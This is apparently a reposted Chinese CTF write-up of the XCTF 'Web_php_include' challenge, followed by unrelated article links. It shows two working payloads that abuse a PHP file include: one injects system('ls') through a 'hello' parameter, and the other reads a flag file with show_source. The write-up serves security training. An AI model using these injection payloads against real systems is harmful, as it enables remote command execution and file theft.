博客
关于我
XCTF web Web_php_include (php://过滤)
阅读量:322 次
发布时间:2019-03-04

本文共 276 字,大约阅读时间需要 1 分钟。

题目代码

用php://来引入文件流,然后include显示文件信息

php://被过滤,但是有个hello

因为这个页面就是默认页面,而且默认页面也可以用index.php来访问

可以把page转到当前页面,并且配合hello来执行一条php函数的语句获取信息就可以了。

?page=http://127.0.0.1/index.php/?hello=<?system("ls");?>

?page=http://127.0.0.1/index.php/?hello=<?show_source("fl4gisisish3r3.php");?>

转载地址:http://wknh.baihongyu.com/

你可能感兴趣的文章
seo 回忆录百度基本概念(一)
查看>>
重新整理数据结构与算法(c#)—— 算法套路二分法[二十四]
查看>>
不一样的备忘录模式(设计模式十六)
查看>>
【golang-GUI开发】qt之signal和slot(一)
查看>>
kettle 执行 kjb 临时文件夹 /tmp permission denied 问题
查看>>
Markdown使用笔记
查看>>
「从零单排HBase 06」你必须知道的HBase最佳实践
查看>>
「从零单排canal 04」 启动模块deployer源码解析
查看>>
用ThreadLocal来优化下代码吧
查看>>
netcore中使用session
查看>>
Android 开发学习进程0.25 自定义控件
查看>>
多媒体文件格式全解说(下)--图片
查看>>
淘宝WAP版小BUG分析
查看>>
Java并发之ThreadPoolExecutor源码解析(三)
查看>>
TCP/IP网络编程之域名及网络地址
查看>>
Redis实现之对象(三)
查看>>
NodeJS+Express+MongoDB
查看>>
(四十四)c#Winform自定义控件-水波-HZHControls
查看>>
c#winform主题实现的一个方法
查看>>
asp.net打印网页后自动关闭网页【无需插件】
查看>>